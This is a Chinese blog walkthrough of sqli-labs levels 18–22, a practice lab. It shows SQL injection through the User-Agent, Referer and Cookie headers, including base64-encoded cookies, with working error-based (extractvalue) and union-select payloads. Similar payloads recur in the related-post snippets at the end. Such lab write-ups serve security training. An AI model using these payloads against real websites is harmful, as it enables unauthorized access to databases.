sqli-labs通关(十八)~(二十二)

已于 2023-05-05 20:32:40 修改
阅读量527 收藏
点赞数
分类专栏: sqli-labs通关 文章标签: 数据库 mysql sql web安全 网络安全
于 2023-05-05 20:32:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65950075/article/details/130502106
版权

 第十八关

输入正确的账号密码,就会返回显示我们的User Agent信息,这是在我们的post请求里面的信息

所以我们用burp suite拦截抓包 

                 

 那我们就可以对这个User Agent下手进行注入

当我们把它改成1'时,出现如下报错信息,可以知道语句是由单引号和括号闭合的,但是还有两个参数

打开源码看一下

有一个insert语句,有三个参数,把我们的User Agent,IP和username插入到数据库的security.uagents中

 所以我们构造

User Agent:1',2,3)#

 正常,没有语法报错

 三个参数我们选一个作为我们的报错注入

User Agent:1',2,extractvalue(1,(concat(0x7e,(select database())))))#

 第十九关

 当我们输入正确的账号密码时,页面返回显示我们的referer字段信息

 

 修改referer:1',出现如下报错,结合上题可猜测应该是把referer和IP两个参数插入数据库中,由单引号和括号闭合

 所以我们构造

Referer:1',2)#

 没有语法报错,说明我们的猜测正确

 接下来就构造报错

Referer:1',extractvalue(1,concat(0x7e,(select database()))))#

 爆出库名

 第二十关

输入正确的账号密码,显示我们的cookie字段信息

 用bp抓包,cookie是在get请求里面,先放掉前面的post才能看到cookie

 那我们构造

cookie:uname=admin'

 根据报错,我们知道语句是由单引号闭合

 由刚开始的成功登录页面可知,回显三个字段,所以构造

cookie:uname=-admin'union select 1,2,3#

 继续构造

cookie:uname=-admin'union select database(),version(),3#

 也可以利用报错

 cookie:uname=admin' and extractvalue(1,(concat(0x7e,(select database()))))#

第二十一关

跟第二十关差不多,但是注意到,它的cookie是经过base64编码的

 

所以我们构造的时候要先经过base64编码再进行注入

cookie:uname=admin'

 经过base64编码

cookie:uname=YWRtaW4n 

 根据报错信息知道,有单引号和括号闭合

所以我们构造

cookie:uname=-admin')union select 1,database(),version()#

 base64编码

cookie:uname=LWFkbWluJyl1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLHZlcnNpb24oKSM=

 也可以使用报错注入

cookie:uname=admin')and extractvalue(1,(concat(0x7e,(select database()))))#

第二十二关

跟第二十一关差不多,区别就是双引号闭合 

幕溪WM
关注
专栏目录
Sqli-labs靶场第18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1197
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1405
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs靶场第二十二
gou1791241251的博客
12-31 482
第二十二cookie编码注入! 当我使用")编码后放入cookie中去请求发现报错了!说明很可能是")闭合的 没注入成功,试一下 " , ’ , ‘)这几种情况吧 或不输入单引号和双引号把爱 " and extractvalue(1,concat(’^’,(select database()),’^’)) --+ 注入失败 " and extractvalue(1,concat(’^’,(select database()),’^’)) # 注入成功 这里发现一个问题,在cookie注入时,使用–
Sqlilabs-22
KAKA的博客
07-09 400
这里来到了第一阶段的最后一:22 其实跟 21 一样,只不过变成了双引号 " 而已,直接上菜吧o( ̄▽ ̄)ブ uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM= uname=admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))# 怎么猜单引号加括号,这里当你构造好 payload pos
SQLi Labs Lesson22
1ame的博客
08-18 311
Lesson - 22 Cookie Injection - base64 encoded - Double quotes 用admin账号登陆后,查看cookie,发现cookie为:YWRtaW4= 有了上一节的经验,admin的base64编码为:YWRtaW4=。 通过工具更改cookie进行注入。 对SQL注入语句: " union select 1,2,dat
sqli-labs/Less-22
m0_71299382的博客
11-19 177
sqli-labs第二十二
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 710
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1837
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
Sqli-labs-master超详细通关教程(1-23基础篇)
m0_67391270的博客
06-12 3247
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
SQLi LABS Less-22
wangyuxiang946的博客
08-14 1万+
sqlilabs22,SQLi-LABS第二十一
sqli-labs (less-22)
kukudeshuo的博客
03-11 169
sqli-labs (less-22) 进入22,输入用户名和密码,登入后与前两一样,我们继续猜想为cookie注入 然后利用Cookies Manager +抓取cookie信息,发现也为base64加密 输入’,页面不报错,输入",页面报错 根据错误显示判断闭合方式为"#,并且为字符型注入 查看当前库 " union select 1,2,database()# 接下来的遇上一基本一致,具体步骤请看我的less-21,这里我不具体介绍 ...
基于Sqli-Labs靶场的SQL注入-17~22
Joker
01-03 1708
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7648
sqli-labs,sql注入,burpsuit
sqli-labs-master第21、22
m_ing
05-16 1672
前言:昨天我们研究了http头部cookie注入,反正我是让让抓包软件给搞死了,废了老半天劲!我们来研究下加密后的cookie 第21: 看到这个页面我们还是输入用户密码,返回了这个页面 提示了一系列的信息 我们还是抓包分析下 看到了加密后的cookie 我们查看源代码,看看是怎样的加密方式 是被base64加码算法加密了 我们找个解密软件或者相的程序 我们输入的用户就是admin所以解密正确 先构造语句验证是否存在注入,admin’经过base64编码后YWRtaW4n,带入测试发现报错
sqli-labs第二十一和二十二(加密cookie注入)
qq_42266432的博客
08-31 463
进入到第21,登录admin,发现这还是cookie注入,只不过cookie和上一有点不同,被加密了,于是将YWRtaW4复制下来,找一个加解密工具解密,由于加密未设偏移量啥的,所以很轻松就能发现使用的是base64加密做到这里的话,思路和上一一样了 使用burp抓包,并将cookie后加个n 页面回显错误 寻找闭合,将cookie修改为YWRtaW4nKSM=,即base64加密后的admin’)#,结果如上图,闭合成功 YWRtaW4nKSBvcmRlciBieSA0Iw==为加密后的admi.
sqli-labs-Less18 User-Agent注入
feng的博客
09-24 292
进入之前看了看题目的提示,是header injection,大致就知道考的是什么了。 进入环境,输入admin,admin,回显了127.0.0.1和我们的user agent。这时候我们要抓包看看,想想ip和user-agent哪个是我们可以注入的,发现ip似乎注入不了,只能user-agent注入。 接下来的user-agent注入就有些讲究了,需要把注入点闭合的情况给试出来,也可以直接去看源码。 如果要试的话,怎么试呢?先输入',发现报错回显了: 这里的回显可能看的还是有些迷,但是多少可以猜测出参
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
4.网络编程
最新发布
weixin_45476535的博客
09-14 336
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
sqli-labs通关28
03-05
通关28其中的一个卡,下面是sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值